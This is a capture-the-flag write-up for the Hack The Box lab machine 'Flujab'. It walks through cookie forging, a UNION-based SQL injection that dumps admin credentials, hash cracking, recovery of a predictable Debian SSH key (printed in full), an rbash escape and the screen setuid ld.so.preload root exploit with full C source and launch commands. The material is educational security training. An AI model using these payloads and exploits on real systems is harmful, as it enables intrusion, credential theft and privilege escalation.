---
title: "Hack The Box - Flujab"
date: 2019-02-11
tags:
  - htb
---

SQLI through email & weak SSH keys in debian to get a user shell & escape RBASH
& screen local root exploit to get a root shell.

## Description

- Name: `Flujab`
- IP : `10.10.10.124`
- Author : `3mrgnc3`
- Difficulty : `7.3/10`

## Discovery

`sudo nmap -sV -sC -p- -v -A --max-retries 2 --min-rate 700 -Pn -oA scan 10.10.10.124`

```
# Nmap 7.60 scan initiated Wed Jan 30 16:32:15 2019 as: nmap -sV -sC -p- -v -A --max-retries 2 --min-rate 700 -Pn -oA scan 10.10.10.124
Host is up (0.044s latency).
Not shown: 65530 closed ports
PORT     STATE    SERVICE   VERSION
22/tcp   open     ssh?
80/tcp   open     http      ClownWare Proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 301 Moved Permanently
|     Date: Wed, 30 Jan 2019 15:36:01 GMT
|     Content-Type: text/html
|     Content-Length: 178
|     Connection: close
|     Location: https://_/
|     Server: ClownWare Proxy
|     <html>
|     <head><title>301 Moved Permanently</title></head>
|     <body bgcolor="white">
|     <center><h1>301 Moved Permanently</h1></center>
|     <hr><center>nginx</center>
|     </body>
|_    </html>
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: ClownWare Proxy
|_http-title: Did not follow redirect to https://clownware.htb/
443/tcp  open     ssl/https ClownWare Proxy
|_http-favicon: Unknown favicon MD5: 74823C5AF1F9E7A4C7D55F0C783A0D46
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Issuer: commonName=ClownWare Certificate Authority/organizationName=ClownWare Ltd./stateOrProvinceName=LON/countryName=UK
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-11-28T14:57:03
| Not valid after:  2023-11-27T14:57:03
| MD5:   1f22 1ef7 c8bf d110 dfe6 2b6f 0765 2245
|_SHA-1: 7013 803a 92b3 f1f0 735d 404b 733c 712b bea6 ffcc
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1
5355/tcp filtered llmnr
8080/tcp open     ssl/http  nginx
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: ClownWare Proxy
|_http-title: Direct IP access not allowed | ClownWare
| ssl-cert: Subject: commonName=ClownWare.htb/organizationName=ClownWare Ltd/stateOrProvinceName=LON/countryName=UK
| Subject Alternative Name: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
| Issuer: commonName=ClownWare Certificate Authority/organizationName=ClownWare Ltd./stateOrProvinceName=LON/countryName=UK
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-11-28T14:57:03
| Not valid after:  2023-11-27T14:57:03
| MD5:   1f22 1ef7 c8bf d110 dfe6 2b6f 0765 2245
|_SHA-1: 7013 803a 92b3 f1f0 735d 404b 733c 712b bea6 ffcc
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=1/30%OT=22%CT=1%CU=40557%PV=Y%DS=2%DC=T%G=Y%TM=5C51C4F
OS:F%P=x86_64-pc-linux-gnu)

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   44.53 ms 10.10.12.1
2   43.65 ms 10.10.10.124

```

As we can see we have different virtual hosts . Trying to set the virtualhost `flujab.htb` and go to http://flujab.htb we have :

![](./screen/flujab-htb.png)

I tried to filter the web sites that have the same page's word count,but unfortunately there are various pages, with different word count. So I tried to filter the web sites based on new line character (`wc -l`) with a bash script (must be run as root):

```sh
#!/bin/bash
help ()
{
        echo "use : ./dns-bruteforce.sh wordlist_file ip_address"
}
if [ $# -lt 2 ]
then
        help
        exit 1
fi
WORDLIST=$1
IP=$2
for DNS in $( cat $WORDLIST );
do
        cp /etc/hosts /etc/hosts.origin
        echo "$IP $DNS" >> /etc/hosts
        curl https://$DNS -s -k > file.output
        count=$(cat file.output | wc -l)
        if [ $count -gt 100 ]
        then
                echo "$DNS is the right one"
        fi
        cp /etc/hosts.origin /etc/hosts
done
rm /etc/hosts.origin
rm file.output
```

writing into a `dns.txt` file the list of dns, and giving `10.10.10.124` as ip_address to the script I found these sites :

* smtp.flujab.htb is the right one
* bestmedsupply.htb is the right one
* freeflujab.htb is the right one

`smtp.flujab.htb` has a login form as follow :

![](./screen/smtp-flujab-htb.png)

I tried using `wfuzz` filtering the default word count of the page (*433*) to find the credentials using a wordlist :

` wfuzz -c --hw 433 -w ~/documents/pentest/seclists/Passwords/darkweb2017-top10000.txt 'https://smtp.flujab.htb/?email=admin@flujab.htb&password=FUZZ'`

But it didn't work. So I moved to the second site.

![](./screen/bestmedsupply.png)

I tried to use gobuster against it, but I receive a wildcard error and trying to go to a random page I got a scary clown picture. I moved to the last list's site `freeflujab.htb`.

![](./screen/freeflujab-htb.png)

I used gobuster in this site but I found a wildcard response, so I made a simple bash script to list the pages of the website based on the word count:

```sh
#!/bin/bash

WORDLIST=$1
for KEY in $( cat $WORDLIST );
do
        curl https://freeflujab.htb/?$KEY -k -s > file.output
        COUNT=$(wc -w file.output)
        COUNT=${COUNT::-12}
        if [ $COUNT -gt 870 ] || [ $COUNT -lt 600 ]
        then
                if [ $COUNT -ne 0 ]
                then
                        echo "word is : $KEY"
                        echo "word count is : $COUNT"
                fi
        fi
done
rm file.output
```

executing the command :

`./dir-fuzzer.sh  ~/documents/pentest/wordlists/dirbuster/directory-list-2.3-small.txt`

I got the already indexed pages :
* word is : stats

  word count is : 2810
* word is : book

  word count is : 328
* word is : reg

  word count is : 355

## Pwn User

Analyzing the cookie of the page I found three cookies :

![](./screen/cookies.png)

* Modus --> which is `Configure=Null` in base64

* Patient --> which is the `md5sum` of my ip

* Registered --> which is `md5sum(myip)=Null` in base64

I saw that there's a cookie associated with the `/?smtp_config` page (Modus).
I got a denied error (not registered) if I tried to access that page , so I tried to change the cookies, using as :

* Modus --> Configure=True in base64

* Registered --> md5sum(myip)=True in base64

I scripted a program to automatically get these information with my ip.

```sh
#!/bin/bash
#sobstitute the tun0 interface with the one you use with htb
ip=$(ip addr show tun0 | awk 'NR==3' | awk '{print $2}');
ip=${ip::-3}
haship=$(echo -n $ip | md5sum | awk '{print $1}');
echo "Patient:$haship"
modus=$(echo -n "Configure=True" | base64)
echo "Modus:$modus"
registered=$(echo -n "$haship=True" | base64)
echo "Registered:$registered"
```

And executing the script I get these cookie that I edited/added to the ones that are in the browser.

```
Patient:f3ca4b1ed0eeff12c176293f118c88cb
Modus:Q29uZmlndXJlPVRydWU=
Registered:ZjNjYTRiMWVkMGVlZmYxMmMxNzYyOTNmMTE4Yzg4Y2I9VHJ1ZQ==
```

Then I tried to access the `/?smtp_config` page and I got this :

![](./screen/smtp_config.png)

Where I can change the smtp server of the page, however I have some client-side control for the correctness of the server name. So i powered up burp suite to bypass it and put my ip as the smtp server.

![](./screen/smtp-post.png)

then I found this [smtp-server](https://www.djangosnippets.org/snippets/96/) in python.
I went on https://freeflujab.htb/?cancel page and I tried to delete some numbers from the database of the appointment :

![](./screen/nhsinj1.png)

and I got this email :

```
Date: Tue, 12 Feb 2019 10:36:50 +0000
To: cancelations@no-reply.flujab.htb
From: Nurse Julie Walters <DutyNurse@flujab.htb>
Subject: Flu Jab Appointment - Ref:
Message-ID: <ca853ce411c11505df9f308af86088c4@freeflujab.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1

    CANCELLATION NOTICE!
  ________________________

    VACCINATION
    Routine Priority
    ------------------
    REF    : NHS-012-345-6789
    Code   : Influ-022
    Type   : Injection
    Stat   : CANCELED
    LOC    : Crick026
  ________________________

  Your flu jab appointment has been canceled.
  Have a nice day,

  Nurse Julie Walters
  Senior Staff Nurse
  Cricklestone Doctors Surgery
  NHS England.
```

I intercept the nhs cancelation request with burp suite and I tried to do a manual SQLI .

![](./screen/nhsinj2.png)

and I got a response , so I incresead the number of columns until `6` where I didn't receive a response, So I knew that there were 5 columns. From there I moved to an union select injection as follow :

`nhsnum=-1'UNION SELECT 1,2,3,4,5-- -'&submit=Cancel+Appointment`

and I got in the email in the ref code the number : `3`, so the third column is injectable , and from there I read the table names.

injection read tables:

```sql
nhsnum=-1' UNION SELECT 1,2,group_concat(table_name),4,5 from (select table_name from information_Schema.tables where table_schema=database()limit 0,100)a-- -'&submit=Cancel+Appointment
```

response :

```
Ref:admin,admin_attribute,admin_password_request,adminattribute,admintoken,attachment,attribute,bounce,bounceregex,bounceregex_bounce,config,eventlog,i18n,linktrack,linktrack_forward,linktrack_ml,linktrack_uml_click,linktrack_userclick,list,listmessage,listuser,message,message_attachment,messagedata,sendprocess,subscribepage,subscribepage_data,template,templateimage,urlcache,user,user_attribute,user_blacklist,user_blacklist_data,user_history,user_message_bounce,user_message_forward,user_message_view,usermessage,userstats
```

injection read admin columns:

```sql
-1' UNION SELECT 1,2,group_concat(column_name),4,5 from (select column_name from information_Schema.columns where table_schema=database() and table_name='admin' limit 0,100)a-- -'
```

response :

```
Ref:id,loginname,namelc,email,access,created,modified,modifiedby,password,passwordchanged,superuser,disabled,privileges
```

injection read admin data:

```sql
-1' UNION SELECT 1,2,group_concat(id,loginname,namelc,email,access,password,passwordchanged),4,5 from (select id,loginname,namelc,email,access,password,passwordchanged from admin limit 0,100)a-- -'
```
response :

```
Ref:1sysadmadministratorsyadmin@flujab.htbsysadmin-console-01.flujab.htba3e30cce47580888f1f185798aca22ff10be617f4a982d67643bb564485086022018-07-02
```

we got a single data's row where we had :

* id --> 1
* loginname --> sysadm
* namelc --> administrator
* email --> syadmin@flujab.htb
* access --> sysadmin-console-01.flujab.htb
* password --> a3e30cce47580888f1f185798aca22ff10be617f4a982d67643bb56448508602
* password_changed --> 2019-07-02

the password is an sha2-256 hash and I was able to crack it with rockyou and hashcat :

`hashcat -m 1400 hash-password-sysadm ~/documents/pentest/rockyou.txt`

and it is : `th3doct0r`

The next step was to use this credential somewhere, and they works only in https://sysadmin-console-01.flujab.htb:8080

username : sysadm

password : th3doct0r

![](./screen/console1.png)

I couldn't go to `Plugins` and `Settings` because I needed a superuser login, so I went on notepad and I tried to open the /home/ directory to search some ssh keys to log on the ssh server .

![](./screen/console2.png)

And in the **drno**'s home I found a private key (*userkey*) and the authorized keys. However even If a decrypted correctly the private key with john the ripper,rockyou,and openssl as described in this site : [link](http://www.cables.ws/cracking-rsa-private-key-passphrase-with-john-the-ripper/), I wasn't able to connect to the ssh because the key was 2048 bit, but **drno** needed a 4096 bit key.
authorized_keys content:

```
# shell whitelisting + key auth enabled
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAqTfCP9e71pkBY+uwbr+IIx1G1r2G1mcjU5GsA42OZCWOKhWg2VNg0aAL+OZLD2YbU/di+cMEvdGZNRxCxaBNtGfMZTTZwjMNKAB7sJFofSwM29SHhuioeEbGU+ul+QZAGlk1x5Ssv+kvJ5/S9vUESXcD4z0jp21CxvKpCGI5K8YfcQybF9/v+k/KkpDJndEkyV7ka/r/IQP4VoCMQnDpCUwRCNoRb/kwqOMz8ViBEsg7odof7jjdOlbBz/F9c/s4nbS69v1xCh/9muUwxCYtOxUlCwaEqm4REf4nN330Gf4I6AJ/yNo2AH3IDpuWuoqtE3a8+zz4wcLmeciKAOyzyoLlXKndXd4Xz4c9aIJ/15kUyOvf058P6NeC2ghtZzVirJbSARvp6reObXYs+0JMdMT71GbIwsjsKddDNP7YS6XG+m6Djz1Xj77QVZbYD8u33fMmL579PRWFXipbjl7sb7NG8ijmnbfeg5H7xGZHM2PrsXt04zpSdsbgPSbNEslB78RC7RCK7s4JtroHlK9WsfH0pdgtPdMUJ+xzv+rL6yKFZSUsYcR0Bot/Ma1k3izKDDTh2mVLehsivWBVI3a/Yv8C1UaI3lunRsh9rXFnOx1rtZ73uCMGTBAComvQY9Mpi96riZm2QBe26v1MxIqNkTU03cbNE8tDD96TxonMAxE=
```

Luckly in debian there was a vulnerability on openssl where you can predict the private key form the public key as described by g0tmik : https://github.com/g0tmi1k/debian-ssh. I downloaded
https://github.com/g0tmi1k/debian-ssh/blob/master/uncommon_keys/debian_ssh_rsa_4096_x86.tar.bz2 and I searched in the directory if there was my authorized_keys :

![](./screen/rsakey.png)

*private key*

```
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
```

To connect to the ssh I edited the `/etc/hosts.allow` adding the following line (twice or it didn't work):

`sshd : <ip_address>`

and then I was able to connect to SSH as *drno*

![](./screen/user-ssh.png)

## Pwn Root

The shell however is restricted and the server is using **rbash** :

![](./screen/rbash.png)

To escape from the restrictions of the rbash where we cannot even use the `/`, I loaded the ssh connection without the `.profile`, which contain the execution of
`/bin/rbash` :

`ssh -i private-key drno@10.10.10.124 -t "bash --noprofile"`

Then the first steps were to change the **PATH** and set the right **gcc**:

```sh
export PATH=/usr/bin/:/bin/:/sbin:/usr/local/bin:$PATH
alias gcc='x86_64-linux-gnu-gcc-6'
```

after changing the permission with `chmod` of drno's home, I copied in the home `linenum` and `pspy64` to enumerate the services and vulnerability.

The **setuid** files were the following :

```
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/local/share/screen/screen
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/screen
/usr/bin/gpasswd
/usr/bin/sudo
/bin/su
/bin/umount
/bin/mount
/bin/ping
```

The program which caught my attention was `screen`, because I found this vulnerability : https://www.exploit-db.com/exploits/41154 .
To be able to got the **root** shell , I used the `/usr/local/share/screen/screen` instead of the one that was in `/usr/bin`, because the first one has the executable bit set, the one in /usr/bin **NO**.

the exploits is divided in two **c** program :

libhax.c (which sets the permission to the rootshell):

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
```

rootshell.c (which sets root permission and execute the shell):

```c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
```

compile (carefully in `/tmp` because every 15 minutes the files in `/tmp` will be removed) and launch the exploit:

```sh
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c
cd /etc
umask 000
/usr/local/share/screen/screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
/usr/local/share/screen/screen -ls
/tmp/rootshell
```

![](./screen/root-shell.png)

## Resources

https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

http://www.securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html

https://github.com/g0tmi1k/debian-ssh
